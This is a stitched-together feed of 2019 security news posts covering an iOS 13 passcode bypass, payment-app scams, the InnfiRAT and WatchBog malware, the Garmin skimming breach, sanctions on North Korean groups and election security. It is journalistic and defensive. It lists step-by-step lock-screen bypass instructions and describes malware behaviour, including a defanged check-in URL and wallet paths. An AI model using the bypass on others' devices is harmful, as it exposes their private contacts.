This is a current list of where and when I am scheduled to speak:

The list is maintained on this page.

Expert disclosed passcode bypass bug in iOS 13 a week before its release

A security researcher disclosed a passcode bypass just a week before Apple has planned to release the new iOS 13 operating system, on September 19.

Apple users are thrilled for the release of the iOS 13 mobile operating system planned for September 19, but a security expert could mess up the party.

The security researcher Jose Rodriguez discovered a passcode bypass issue that could be exploited by attackers to gain access to iPhones contacts and other information even on locked devices.

Below the step by step procedure to exploit the passcode bypass:

  1. Reply to an incoming call with a custom message.
  2. Enable the VoiceOver feature.
  3. Disable the VoiceOver feature
  4. Add a new contact to the custom message
  5. Click on the contacts image to open options menu and select “Add to existing contact”. 
  6. When the list of contacts appears, tap on the other contact to view its info.

Below the video PoC published by Rodriguez that shows how to see a device’s contact information.

Rodriguez reported the flaw to Apple on July 17th, 2019, at the time the new iOS version was still in beta. The expert disclosed the issue on September 11th and at the time Apple had still not addressed the flaw.

Experts hope that Apple will be able to fix the bug withing September 19th.

Rodriguez discovered many other passcode bypass issues in the past, in October 2018, a few hours after Apple released iOS 12.1 the iPhone bug hunter Jose Rodriguez found a new passcode bypass issue that could have been exploited to see all contacts’ private information on a locked iPhone.

A few weeks before, he discovered another passcode bypass vulnerability in Apple’s iOS version 12 that could have been exploited to access photos, contacts on a locked iPhone XS.

The researcher also disclosed a new passcode bypass flaw that could have been exploited to access photos and contacts on a locked iPhone XS.

Pierluigi Paganini

(SecurityAffairs – iOS 13, passcode bypass)

The post Expert disclosed passcode bypass bug in iOS 13 a week before its release appeared first on Security Affairs.

Are Cash Transfer Apps Safe to Use? Here’s What Your Family Needs to Know

cash appsI can’t recall the last time I gave my teenage daughter cash for anything. If she needs money for gas, I Venmo it. A Taco Bell study break with the roommates? No problem. With one click, I transfer money from my Venmo account to hers. She uses a Venmo credit card to make her purchase. To this mom, cash apps may be the best thing to happen to parenting since location tracking became possible. But as convenient as these apps may be, are they safe for your family to use?

How do they work?

The research company, eMarketer, estimates that 96.0 million people used Peer-to-Peer (P2P) payment services this year (that’s 40.4% of all mobile phone users), up from an estimated 82.5 million last year.

P2P technology allows you to create a profile on a transfer app and link your bank account or credit card to it. Once your banking information is set up, you can locate another person’s account on the app (or invite someone to the app) and transfer funds instantly into their P2P account (without the hassle of getting a bank account number, email, or phone number). That person can leave the money in their app account, move it into his or her bank account, or use a debit card issued by the P2P app to use the funds immediately. If the app offers a credit card (like Venmo does), the recipient can use the Venmo card like a credit card at retailers most anywhere. 

Some of the more popular P2P apps include Venmo, Cash App, Zelle, Apple Pay, Google Wallet, PayPal.me, Facebook Messenger, and Snapcash, among others. Because of the P2P platform’s rapid growth, more and more investors are entering the market each day to introduce new cash apps, which is causing many analysts to speculate on need for paper check transactions in the future.

Are they safe?

While sending your hard-earned money back and forth through cyberspace on an app doesn’t sound safe, in general, it is. Are there some exceptions? Always. 

Online scam trends often follow consumer purchasing trends and, right now, the hot transaction spot is P2P platforms. Because P2P money is transferred instantly (and irreversibly), scammers exploit this and are figuring out how to take people’s money. After getting a P2P payment, scammers then delete their accounts and disappear — instantly

In 2018 Consumer Reports (CR) compared the potential financial and privacy risks of five mobile P2P services with a focus on payment authentication and data privacy. CR found all the apps had acceptable encryption but some were dinged for not clearly explaining how they protected user data. The consumer advocacy group ranked app safety strength in this order: Apple Pay, Venmo, Cash App, Facebook Messenger, and Zelle. CR also noted they “found nothing to suggest that using these products would threaten the security of your financial and personal data.”

While any app’s architecture may be deemed safe, no app user is immune from scams, which is where app safety can make every difference. If your family uses P2P apps regularly, confirm each user understands the potential risks. Here are just a few of the schemes that have been connected to P2P apps.

cash apps

Potential scams

Fraudulent sellers. This scam targets an unassuming buyer who sends money through a P2P app to purchase an item from someone they met online. The friendly seller casually suggests the buyer “just Venmo or Cash App me.” The buyer sends the money, but the item is never received, and the seller vanishes. This scam has been known to happen in online marketplaces and other trading sites and apps.

Malicious emails. Another scam is sending people an email telling them that someone has deposited money in their P2P account. They are prompted to click a link to go directly to the app, but instead, the malicious link downloads malware onto the person’s phone or computer. The scammer can then glean personal information from the person’s devices. To avoid a malware attack, consider installing comprehensive security software on your family’s computers and devices.

Ticket scams. Beware of anyone selling concert or sporting event tickets online. Buyers can get caught up in the excitement of scoring tickets for their favorite events, send the money via a P2P app, but the seller leaves them empty-handed.

Puppy and romance scams. In this cruel scam, a pet lover falls in love with a photo of a puppy online, uses a P2P app to pay for it, and the seller deletes his or her account and disappears. Likewise, catfish scammers gain someone’s trust. As the romantic relationship grows, the fraudulent person eventually asks to borrow money. The victim sends money using a P2P app only to have their love interest end all communication and vanish.  

P2P safety: Talking points for families

Only connect with family and friends. When using cash apps, only exchange money with people you know. Unlike an insured bank, P2P apps do not refund the money you’ve paid out accidentally or in a scam scenario. P2P apps hold users 100% responsible for transfers. 

Verify details of each transfer. The sender is responsible for funds, even in the case of an accidental transfer. So, if you are paying Joe Smith your half of the rent, be sure you select the correct Joe Smith, (not Joe Smith_1, or Joe Smithe) before you hit send. There could be dozens of name variations to choose from in an app’s directory. Also, verify with your bank that each P2P transaction registers.

Avoid public Wi-Fi transfers. Public Wi-Fi is susceptible to hackers trying to access valuable financial and personal information. For this reason, only use a secure, private Wi-Fi network when using a P2P payment app. If you must use public Wi-Fi, consider using a Virtual Private Network (VPN).

cash apps

Don’t use P2P apps for business. P2P apps are designed to be used between friends and include no-commercial-use clauses in their policies. For larger business transactions such as buying and selling goods or services use apps like PayPal. 

Lock your app. When you have a P2P app on your phone, it’s like carrying cash. If someone steals your phone, they can go into an unlocked P2P app and send themselves money from your bank account. Set up extra security on your app. Most apps offer PINs, fingerprint IDs, and two-factor authentication. Also, always lock your device home screen.

Adjust privacy settings. Venmo includes a feed that auto shares when users exchange funds, much like a social media feed. To avoid a stranger seeing that you paid a friend for Ed Sheeran tickets (and won’t be home that night), be sure to adjust your privacy settings. 

Read disclosures. One way to assess an app’s safety is to read its disclosures. How does the app protect your privacy and security? How does the app use your data? What is the app’s error-resolution policy? Feel secure with the app you choose.

We’ve learned that the most significant factor in determining an app’s safety comes back to the person using it. If your family loves using P2P apps, be sure to take the time to discuss the responsibility that comes with exchanging cash through apps. 

The post Are Cash Transfer Apps Safe to Use? Here’s What Your Family Needs to Know appeared first on McAfee Blogs.

InnfiRAT Trojan steals funds from Bitcoin and Litecoin wallets

Researchers at Zscaler have spotted a new malware dubbed InnfiRAT that infects victims’ systems to steal cryptocurrency wallet data. 

Researchers at Zscaler have discovered a new Trojan dubbed InnfiRAT that implements many standard Trojan capabilities along with the ability to steal cryptocurrency wallet data. 

“As with just about every piece of malware, InnfiRAT is designed to access and steal personal information on a user’s computer.” states a blog post published by Zscaler. “Among other things, InnfiRAT is written to look for cryptocurrency wallet information, such as Bitcoin and Litecoin. InnfiRAT also grabs browser cookies to steal stored usernames and passwords, as well as session data.”

Upon execution, the malware initially checks whether the file is executing from %AppData% directory or not with the name NvidiaDriver.exe. The malware then checks for network connectivity by making a request to “iplogger[.]com/1HEt47,” and records all the running processes in an array to check whether any of them is running with the name NvidiaDriver.exe. If it finds one of the processes running with this name, it kills that process and waits for an exit.

The malicious code will make a copy of itself in the AppData directory before writing a Base64 encoded PE file in memory to execute the main component of the Trojan. 

As the execution of the malware starts, it checks for the presence of virtualized environment that could be used by researchers to analyze the threat. If the malware is not running in a sandbox it will contact the command-and-control (C2) server, transfer the information stolen form the machine, and await further commands.

The InnfiRAT Trojan can also deploy additional payloads to steal files, capture browser cookies to harvest stored credentials for various online services and grab open sessions. The malware is also able to shut down traditional antivirus processes.

InnfiRAT scans the machine for files associated with Bitcoin (BTC) and Litecoin (LTC) wallets (Litecoin: %AppData%\Litecoin\wallet.dat,
Bitcoin%AppData%\Bitcoin\wallet.dat), if they are present, the malicious code siphons existing data in the attempt of stealing the victims’ funds.

Bitcoin

“Because RATs are usually downloaded as a result of a user opening an email attachment or downloading an application that has been infected, the first line of defense is often the users who must, as always, refrain from downloading programs or opening attachments that aren’t from a trusted source.” concludes the researchers.

Pierluigi Paganini

(SecurityAffairs – InnfiRAT, hacking)

The post InnfiRAT Trojan steals funds from Bitcoin and Litecoin wallets appeared first on Security Affairs.

Hackers stole payment data from Garmin South Africa shopping portal

Garmin, the multinational company focused on GPS technology for automotive, aviation, marine, outdoor, and sport activities is victim of a data breach.

Garmin is the victim of a data breach, it is warning customers in South Africa that shopped on the shop.garmin.co.za portal that their personal info and payment data were exposed.

Garmin data breach

The stolen data, included customers’ home addresses, phone numbers, emails, and credit card information that could be used to make purchases (i.e. Card number, expiration date and CVV code for your payment card).

“We recently discovered theft of customer data from orders placed through shop.garmin.co.za (operated by Garmin South Africa) that compromised your personal data related to an order that you placed through the website,” said Jennifer Van Niekerk, South Africa Managing Director.

“The compromised data was limited to only Garmin’s South Africa site, and contained payment information, including the number, expiration date and CVV code for your payment card, along with your first and last name, physical address, phone number and email address.”

Garmin SA recommends customers to review and monitor all their payment card records for any purchases, it seems that the company is not offering to the impacted customers any fraud protection service.

Impacted customers have to contact their bank or payment card provider.

The breached shopping portal was using the popular Magento ecommerce platform, it was shut down after the security breach was discovered.

The Register contacted Garmin South Africa to receive more info on the incident, the company confirmed that the attackers used a software skimmer to siphon customers payment details.

Garmin explained that the e-commerce site “was operated by a third party on behalf of Garmin South Africa.”

“Promptly after learning of this incident, we immediately shut down the impacted system, began an investigation, and contacted the South African Information Regulator.” Garmin told to ElReg.

“While Garmin does not store credit card information, the unauthorized party leveraged virtual skimming technology to capture customer details at the time of input, including credit card information.” It added that the incident was isolated to a few thousand customers who accessed the SA portal: “This incident affected less than 6,700 customers in South Africa and does not affect customers who purchased from other Garmin websites in other regions.”

When dealing with such kind of attacks, most of them were carried out by an umbrella of hacking crews that are tracked as Magecart, but at the time their involvement was not demonstrated by any security firm.

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Hackers stole payment data from Garmin South Africa shopping portal appeared first on Security Affairs.

The US Treasury placed sanctions on North Korea linked APT Groups

The US Treasury placed sanctions on three North Korea-linked hacking groups, the Lazarus Group, Bluenoroff, and Andarial.

The US Treasury sanctions on three North Korea-linked hacking groups, the Lazarus Group, Bluenoroff, and Andarial.

The groups are behind several hacking operations that resulted in the theft of hundreds of millions of dollars from financial institutions and cryptocurrency exchanges worldwide and destructive cyber-attacks on infrastructure. Lazarus Group is also considered the threat actors behind the 2018 massive WannaCry attack.

According to the Treasury, the three groups “likely” stole $571 million in cryptocurrency from five Asian exchanges in 2017 and 2018.

Intelligence analysts believe the groups are under the control of the Reconnaissance General Bureau, which is North Korea’s primary intelligence bureau.

“Treasury is taking action against North Korean hacking groups that have been perpetrating cyber attacks to support illicit weapon and missile programs,” said Sigal Mandelker, Treasury Under Secretary for Terrorism and Financial Intelligence.

“We will continue to enforce existing US and UN sanctions against North Korea and work with the international community to improve cybersecurity of financial networks.”

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

The group is considered responsible for the massive WannaCry ransomware attack, a string of SWIFTattacks in 2016, and the Sony Pictures hack.

Bluenoroff is considered a sub-group of the Lazarus APT that was formed by the North Korean government to earn revenue from hacking campaigns in response to increased global sanctions.  

“According to industry and press reporting, by 2018, Bluenoroff had attempted to steal over $1.1 billion dollars from financial institutions and, according to press reports, had successfully carried out such operations against banks in Bangladesh, India, Mexico, Pakistan, Philippines, South Korea, Taiwan, Turkey, Chile, and Vietnam.” continues the US Treasury.

Andariel, is another Lazarus subgroup that focuses in targeting businesses, government agencies, and individuals. In conducted multiple attacks aimed at stealing bank card information and on ATMs.

Andariel carried out cyber attacks against online gambling and poker sites.

The sanctions placed by the US Treasury aim to lock the access to the global financial system and to freeze any assets held under US jurisdiction.

“As a result of today’s action, all property and interests in property of these entities, and of any entities that are owned, directly or indirectly, 50 percent or more by the designated entities, that are in the United States or in the possession or control of U.S. persons are blocked and must be reported to OFAC.” states the US Treasury. “OFAC’s regulations generally prohibit all dealings by U.S. persons or within (or transiting) the United States that involve any property or interests in property of blocked or designated persons. “

Pierluigi Paganini

(SecurityAffairs – North Korea, hacking)

The post The US Treasury placed sanctions on North Korea linked APT Groups appeared first on Security Affairs.

Symantec Axes Hundreds of US Jobs

Symantec Axes Hundreds of US Jobs

American software giant Symantec is cutting hundreds of jobs at four different sites across the US as part of a $100 million restructuring program.

Government filings of notices made by the company in August under the Worker Adjustment and Retraining Notification (WARN) Act indicate that the roles of 230 Symantec employees will be terminated on October 15, 2019.  

The company's Californian headquarters at Mountain View will bear the brunt of the losses, with 152 job cuts expected. In San Francisco 18 jobs will go, and a further 24 will be axed from the company's site in Springfield, Oregon. In Culver City, Los Angeles County, 36 positions will be scrapped. Employees were notified in early August. 

The cuts will affect many different job classifications but most of the roles targeted were primarily related to tech work. According to the Employment Development Department (EDD) filings made by Symantec in California, many software engineer and software development engineer jobs are to go along with a raft of middle-management positions.

In a letter which accompanied the filings, Symantec wrote: “Layoffs are expected to be permanent," before stating, "None of the affected employees are represented by a union, and no bumping rights exist."

Symantec, which supplies 50 million people with Norton antivirus software and LifeLock identity theft protection, has over 11,000 employees globally. The US job cuts are part of a planned 7% reduction in Symantec's international workforce announced last month alongside news of the company's $10.7 billion sale of its enterprise division to San Jose chipmaker Broadcom.

News of the cuts come amid rumors that Symantec has received interest from two private-equity suitors who, according to the Wall Street Journal, are seeking to buy the cybersecurity firm for more than $16 billion.

The Journal reported that "Permira and Advent International Corp. recently approached Symantec proposing a takeover deal valuing Symantec at $26 to $27 a share that would hand them the company’s consumer operation while preserving the sale of its enterprise business to Broadcom Inc." 

With the sale of its enterprise arm to Broadcom pending, it's not clear how the proposed deal would work if it was to go ahead.

WatchBog cryptomining botnet now uses Pastebin for C2

A new cryptocurrency-mining botnet tracked as WatchBog is heavily using the Pastebin service for command and control (C&C) operations.

Cisco Talos researchers discovered a new cryptocurrency-mining botnet tracked as WatchBog is heavily using the Pastebin service for command and control.

The WatchBog bot is a Linux-based malware that is active since last year, it targets systems to mine for the Monero virtual currency.

“Cisco Incident Response (CSIRS) recently responded to an incident involving the Watchbog cryptomining botnet. The attackers were able to exploit CVE-2018-1000861 to gain a foothold and install the Watchbog malware on the affected systems.” states the analysis published by Cisco Talos.

“This Linux-based malware relied heavily on Pastebin for command and control (C2) and operated openly. CSIRS gained an accurate understanding of the attacker’s intentions and abilities on a customer’s network by analyzing the various Pastebins.”

Recently, experts at Intezer researchers have spotted a strain of the Linux mining that also scans the Internet for Windows RDP servers vulnerable to the Bluekeep.

WatchBog

The new WatchBog variant includes a new spreader module along with exploits for the following recently patched vulnerabilities in Linux applications:

The malware also includes scanners for Jira and Solr flaws along with Brute-forcing module for CouchDB and Redis installs.

The operators behind the WatchBog botnet claim to be able to identify vulnerabilities in enterprise systems “before any ‘real’ hackers could do so,” and offer their protection services. However, every time the operators identify vulnerable hosts, the systems are recruited in the crypto-mining botnet,

“During the investigation, Cisco IR found signs of hosts becoming a part of a separate botnet around the time of the Watchbog activity. This raises serious doubts about the “positive” intentions of this adversary.” continues Talos.

During the installation phase, the bot checks for running processes associated with other cryptocurrency miners, then it will use a script to terminate them.

Then determines whether it can write to various directories, checks the system architecture, and then makes three attempts to download and install a ‘kerberods’ dropper using wget or curl. .

The installation script also retrieves the contents of a Pastebin URL containing a Monero wallet ID and mining information, then it downloads the miner. The script also checks if the ‘watchbog‘ process is running, if it is not founb, the ‘testa‘ or ‘download’ functions are called to install the version of the miner that match the target architecture.

The ‘testa‘ function is used to facilitate the infection process, is responsible for writing the various configuration data used by the miner.

The script downloads encoded Pastebins as a text file and gives it execution permissions. The script finally starts the Watchbog process and deletes the text file.

The ‘download’ function performs similar operations by writing the contents retrieved from various file locations, once determined the target architecture it installs the appropriate miner.

The WatchBog uses SSH for lateral movements, a specific script also checks for the existence of SSH keys into the target systems in the attempt to use it while targeting other systems.

Talos researchers also noticed that threat actors leverage a Python script that scans for open Jenkins and Redis ports on the host’s subnet for lateral movement. Attackers also rely on cron jobs to achieve persistence and attempt to cover their tracks by erasing or overwriting files and logs.

Unpatched web applications vulnerable to known CVEs are a major target for attackers. Adversaries can leverage the vulnerability to gain a foothold into the web server and network environment in which the web server is deployed.” concludes the report. “The best way to prevent such activity would be to ensure that all enterprise web applications are up to date,” Talos notes.

Pierluigi Paganini

(SecurityAffairs – WatchBog, malware)

The post WatchBog cryptomining botnet now uses Pastebin for C2 appeared first on Security Affairs.

Cybersecurity Firm Employees Charged with Burglary of Courthouse Client

Cybersecurity Firm Employees Charged with Burglary of Courthouse Client

Two employees of a Colorado cybersecurity firm hired to test the security of an Iowa courthouse have been charged with burglary after allegedly breaking into the building.  

Gary Edward Demercurio, 43, of Seattle, Wash., and Justin Lawson Wynn, 29, of Naples, Fla., were arrested at approximately 1 a.m. on Wednesday morning after being found inside the Dallas County Courthouse in possession of burglary tools. 

Dallas County deputy sheriffs arrived at the scene after an alarm at the courthouse at 908 Court Street in Adel was tripped.

Demercurio and Wynn, who both work for global cybersecurity firm Coalfire, have been charged with third-degree burglary and possession of burglary tools. 

At the time of their arrest, Demercurio and Wynn told Dallas County deputy sheriffs that "they were contracted to break into the building for Iowa courts to check the security of the building."

In a press release issued later that day, Iowa Judicial Branch confirmed that while the state court administration had hired cybersecurity firm Coalfire to carry out security testing, the midnight shenanigans allegedly committed by Wynn and Demercurio were not exactly what it had in mind. 

While the administration had asked Coalfire to test vulnerabilities in the the state’s electronic records system, it "did not intend, or anticipate, those efforts to include the forced entry into a building."

"It’s a strange case," said Dallas County Sheriff Chad Leonard on Wednesday. "We’re still investigating this thing."

When contacted for comment, Coalfire replied with the following statement: "Coalfire is a global cybersecurity firm that has conducted over 10,000 security assessments since 2001. We have performed hundreds of assessments for similar government agencies, and our employees work diligently to ensure our engagements are conducted with utmost integrity and in alignment with the objectives of our client. 

"However, we cannot comment on this situation or any specific client engagements due to the confidential nature of our work and various security and privacy laws. Additionally, we cannot comment on this specific case as it is an active legal matter." 

Demercurio was released from Dallas County Jail after posting a $57,000 bond. Wynn was likewise released after posting a bond of $50,000. Both men are scheduled to appear before Dallas County District Court for a preliminary hearing on September 23.

When Biology Becomes Software

All of life is based on the coordinated action of genetic parts (genes and their controlling sequences) found in the genomes (the complete DNA sequence) of organisms.

Genes and genomes are based on code-- just like the digital language of computers. But instead of zeros and ones, four DNA letters --- A, C, T, G -- encode all of life. (Life is messy, and there are actually all sorts of edge cases, but ignore that for now.) If you have the sequence that encodes an organism, in theory, you could recreate it. If you can write new working code, you can alter an existing organism or create a novel one.

If this sounds to you a lot like software coding, you're right. As synthetic biology looks more like computer technology, the risks of the latter become the risks of the former. Code is code, but because we're dealing with molecules -- and sometimes actual forms of life -- the risks can be much greater.

Imagine a biological engineer trying to increase the expression of a gene that maintains normal gene function in blood cells. Even though it's a relatively simple operation by today's standards, it'll almost certainly take multiple tries to get it right. Were this computer code, the only damage those failed tries would do is to crash the computer they're running on. With a biological system, the code could instead increase the likelihood of multiple types of leukemias and wipe out cells important to the patient's immune system.

We have known the mechanics of DNA for some 60 plus years. The field of modern biotechnology began in 1972 when Paul Berg joined one virus gene to another and produced the first "recombinant" virus. Synthetic biology arose in the early 2000s when biologists adopted the mindset of engineers; instead of moving single genes around, they designed complex genetic circuits.

In 2010 Craig Venter and his colleagues recreated the genome of a simple bacterium. More recently, researchers at the Medical Research Council Laboratory of Molecular Biology in Britain created a new, more streamlined version of E. coli. In both cases the researchers created what could arguably be called new forms of life.

This is the new bioengineering, and it will only get more powerful. Today you can write DNA code in the same way a computer programmer writes computer code. Then you can use a DNA synthesizer or order DNA from a commercial vendor, and then use precision editing tools such as CRISPR to "run" it in an already existing organism, from a virus to a wheat plant to a person.

In the future, it may be possible to build an entire complex organism such as a dog or cat, or recreate an extinct mammoth (currently underway). Today, biotech companies are developing new gene therapies, and international consortia are addressing the feasibility and ethics of making changes to human genomes that could be passed down to succeeding generations.

Within the biological science community, urgent conversations are occurring about "cyberbiosecurity," an admittedly contested term which exists between biological and information systems where vulnerabilities in one can affect the other. These can include the security of DNA databanks, the fidelity of transmission of those data, and information hazards associated with specific DNA sequences that could encode novel pathogens for which no cures exist.

These risks have occupied not only learned bodies -- the National Academies of Sciences, Engineering, and Medicine published at least a half dozen reports on biosecurity risks and how to address them proactively -- but have made it to mainstream media: genome editing was a major plot element in Netflix's Season 3 of "Designated Survivor."

Our worries are more prosaic. As synthetic biology "programming" reaches the complexity of traditional computer programming, the risks of computer systems will transfer to biological systems. The difference is that biological systems have the potential to cause much greater, and far more lasting, damage than computer systems.

Programmers write software through trial and error. Because computer systems are so complex and there is no real theory of software, programmers repeatedly test the code they write until it works properly. This makes sense, because both the cost of getting it wrong and the ease of trying again is so low. There are even jokes about this: a programmer would diagnose a car crash by putting another car in the same situation and seeing if it happens again.

Even finished code still has problems. Again due to the complexity of modern software systems, "works properly" doesn't mean that it's perfectly correct. Modern software is full of bugs -- thousands of software flaws -- that occasionally affect performance or security. That's why any piece of software you use is regularly updated; the developers are still fixing bugs, even after the software is released.

Bioengineering will be largely the same: writing biological code will have these same reliability properties. Unfortunately, the software solution of making lots of mistakes and fixing them as you go doesn't work in biology.

In nature, a similar type of trial and error is handled by "the survival of the fittest" and occurs slowly over many generations. But human-generated code from scratch doesn't have that kind of correction mechanism. Inadvertent or intentional release of these newly coded "programs" may result in pathogens of expanded host range (just think swine flu) or organisms that wreck delicate ecological balances.

Unlike computer software, there's no way so far to "patch" biological systems once released to the wild, although researchers are trying to develop one. Nor are there ways to "patch" the humans (or animals or crops) susceptible to such agents. Stringent biocontainment helps, but no containment system provides zero risk.

Opportunities for mischief and malfeasance often occur when expertise is siloed, fields intersect only at the margins, and when the gathered knowledge of small, expert groups doesn't make its way into the larger body of practitioners who have important contributions to make.

Good starts have been made by biologists, security agencies, and governance experts. But these efforts have tended to be siloed, in either the biological and digital spheres of influence, classified and solely within the military, or exchanged only among a very small set of investigators.

What we need is more opportunities for integration between the two disciplines. We need to share information and experiences, classified and unclassified. We have tools among our digital and biological communities to identify and mitigate biological risks, and those to write and deploy secure computer systems.

Those opportunities will not occur without effort or financial support. Let's find those resources, public, private, philanthropic, or any combination. And then let's use those resources to set up some novel opportunities for digital geeks and bionerds -- as well as ethicists and policymakers -- to share experiences, concerns, and come up with creative, constructive solutions to these problems that are more than just patches.

These are overarching problems; let's not let siloed thinking or funding get in the way of breaking down barriers between communities. And let's not let technology of any kind get in the way of the public good.

This essay previously appeared on CNN.com.

Week in security with Tony Anscombe

ESET researchers found an undocumented backdoor used by the infamous Stealth Falcon group, an operator of targeted spyware attacks against journalists, activists and dissidents in the Middle East. With the launch of the Safer Kids online initiative, a guide to help parents protect their kids when they take selfie. The discovery of a serious vulnerability

The post Week in security with Tony Anscombe appeared first on WeLiveSecurity

MSOE Opens Cyber-Learning Center Built with $34m Alumnus Donation

MSOE Opens Cyber-Learning Center Built with $34m Alumnus Donation

A Wisconsin university today celebrated the grand opening of a new cyber-learning facility funded by a $34m donation from a former student and his wife. 

Dwight Diercks graduated from the Milwaukee School of Engineering (MSOE) in 1990 with a degree in computer science and engineering. Now senior vice president of software engineering at California-based technology company NVIDIA, Diercks today serves as a regent of the university, which awarded him an honorary engineering doctorate in 2014.

A day-long program of events was held to mark the opening of the Dwight and Dian Diercks Computational Science Hall, which included a keynote address by Jensen Huang, founder, president, and CEO of NVIDIA.

According to the MSOE website, "Diercks Hall—and the courses taught within—position MSOE at the educational forefront in artificial intelligence (AI), deep learning, cyber security, robotics, cloud computing and other next-generation technologies."

The four-floor building features seven contemporary classrooms, nine innovative teaching laboratories, 25 offices for staff, and a 256-seat auditorium. At the heart of the hall is a state-of-the-art data center with an NVIDIA GPU-accelerated AI supercomputer, which is named Rosie after the women known as Rosies who programmed one of the earliest computers, the ENIAC. Rosie is also the name of Diercks' mother, who passed away in 2006.

On the building's third floor, the Caspian Cyber Security Laboratory will allow students to conduct real-world cybersecurity experiments and test defensive mechanisms in a professional and controlled environment. The room is grounded with special shielding paint and an electromagnetic field to prevent computer viruses that students are working on from spreading to the rest of campus through the wireless network.

The substantial donation given by Diercks and his wife, Dian, was bolstered with an additional $4m contributed by several individuals and corporations to support long-term operations and maintenance of the facility. 

Speaking at today's live-streamed opening ceremony, held in the new hall's atrium, the mayor of Milwaukee, Tom Barrett, quipped, "When I first heard the words artificial intelligence I thought someone had heard I had inflated my SAT scores," before declaring Friday, September 13, 2019, to be Dwight and Dian Diercks Day throughout the entire city of Milwaukee.

After Diercks and his wife cut a red ribbon with a giant pair of scissors to officially open the hall, he shared with the crowd his pleasure at learning that the addition of an external staircase to the building had increased the facility's final size to a square footage of 65,536, which is the number of different values representable in a number of 16 bits.

Prediction: 2020 election is set to be hacked, if we don’t act fast

Since 1993, hackers have traveled to Las Vegas from around the world to demonstrate their skills at DefCon’s annual convention, and every year new horrors of cyber-insecurity are revealed as they wield their craft. Last year, for example, an eleven-year-old boy changed the election results on a replica of the Florida state election website in under ten minutes.

This year was no exception. Participants revealed all sorts of clever attacks and pathetic vulnerabilities. One hack allowed a convention attendee to commandeer control of an iPhone with a non-Apple-issue charging cord, one that is identical to the Apple version. Another group figured out how to use a Netflix account to steal banking information. But for our purposes, let’s focus on election security because without it democracy is imperiled. And if you think about it, what are the odds of something like DefCon being permitted in the People’s Republic of China?

Speaking of China (or Russia or North Korea or Iran or…) will the 2020 election be hacked?

In a word: Yes.

In 2016 Russia targeted elections systems in all 50 states.

A CNN article about DefCon’s now annual Voting Village, described the overall problem: Many election officials and key players in the election business are not sufficiently worried to anticipate, recognize and meet the challenges ahead.

While many organizations welcome the hijinks of DefCon participants — including the Pentagon — the voting machine manufacturers don’t generally seem eager to have hackers of any stripe show them where they are vulnerable… and that should worry you.

DefCon participants are instructed to break things, and they do just that. This year, Senator Ron Wyden (D-Ore.) toured DefCon’s Voting Village and he left with these words: “We need paper ballots, guys.”

Was the Senator right? It’s the easiest solution, but not the only one. Because elections machines are thus far preeminently breakable, we still need audited paper trails.

Paper trails are mission critical

After railing against previous findings of DefCon participants, Election Systems and Software (ES&S) CEO Tom Burt reversed his position in a Roll Call op-ed that called for paper records and mandatory machine testing in order to secure e-voting systems. It’s a welcome move as far as cybersecurity experts are concerned.

After a midterm election featuring irregularities in GeorgiaNorth Carolina and other smaller hacks, and warnings from the likes of Special Prosecutor Robert Mueller, there has been no meaningful action nationwide when it comes to election security, while the specter of serious interference remains. Senate Majority Leader Mitch McConnell (R-Ky.) has steadfastly refused to allow even bi-partisan election security legislation to come to the floor for a vote, much less a debate, and for that reason he and the Republican party are blameworthy for placing politics above protecting our most cherished democratic right.

While the news is on overheated cycles covering every tweet, or sound bite, uttered by President Trump, critical issues like cybersecurity are not being addressed, and this matters — given recent DefCon news of election machines connected to the internet when they shouldn’t be, and the persistent threat of state-sponsored attacks on our democracy.

Think DARPA’s $10 million un-hackable election machine proves all is well? Not quite. Bugs during the set up of the DARPA wonder machine meant that DefCon’s participants didn’t have enough time to properly break the thing. In the absence of definitive proof to the contrary, we have to assume it can be hacked.

What Now?

Instead of discussing the nation’s Voter ID laws, we need to focus on securing the vote.

It is well-established fact that Russia attempted to interfere in the 2016 election in all 50 states, and Israel — an ally of the president — recently disclosed that the Russian government identified President Trump as the candidate most likely to benefit Russia, and used cyberbots to help him win. The fact that President Trump won the election on the strength of just 80,000 votes spread across three key swing states shows how important it is to address the issue. We’re not talking about a blunderbuss approach to hacking the election here. Plausible outcomes can be constructed. It’s been known to happen before.

Some experts think it may soon be too late to secure 2020 against the threat of state-sponsored hacks. I do not. But I think the time to delay to score political points has passed, and now is the time for action.

The post Prediction: 2020 election is set to be hacked, if we don’t act fast appeared first on Adam Levin.

Five Thoughts on the Internet Freedom League

In the September/October issue of Foreign Affairs magazine, Richard Clarke and Rob Knake published an article titled "The Internet Freedom League: How to Push Back Against the Authoritarian Assault on the Web," based on their recent book The Fifth Domain. The article proposes the following:

The United States and its allies and partners should stop worrying about the risk of authoritarians splitting the Internet. 

Instead, they should split it themselves, by creating a digital bloc within which data, services, and products can flow freely, excluding countries that do not respect freedom of expression or privacy rights, engage in disruptive activity, or provide safe havens to cybercriminals...

The league would not raise a digital Iron Curtain; at least initially, most Internet traffic would still flow between members and nonmembers, and the league would primarily block companies and organizations that aid and abet cybercrime, rather than entire countries. 

Governments that fundamentally accept the idea of an open, tolerant, and democratic Internet but that struggle to live up to such a vision would have an incentive to improve their enforcement efforts in order join the league and secure connectivity for their companies and citizens. 

Of course, authoritarian regimes in China, Russia, and elsewhere will probably continue to reject that vision. 

Instead of begging and pleading with such governments to play nice, from now on, the United States and its allies should lay down the law: follow the rules, or get cut off.

My initial reaction to this line of thought was not encouraging. Rather than continue exchanging Twitter messages, Rob and I had a very pleasant phone conversation to help each other understand our points of view. Rob asked me to document my thoughts in a blog post, so this is the result.

Rob explained that the main goal of the IFL is to create leverage to influence those who do not implement an open, tolerant, and democratic Internet (summarized below as OTDI). I agree that leverage is certainly lacking, but I wondered if the IFL would accomplish that goal. My reservations included the following.

1. Many countries that currently reject the OTDI might only be too happy to be cut off from the Western Internet. These countries do not want their citizens accessing the OTDI. Currently dissidents and others seeking news beyond their local borders must often use virtual private networks and other means to access the OTDI. If the IFL went live, those dissidents and others would be cut off, thanks to their government's resistance to OTDI principles.

2. Elites in anti-OTDI countries would still find ways to access the Western Internet, either for personal, business, political, military, or intelligence reasons. The common person would be mostly likely to suffer.

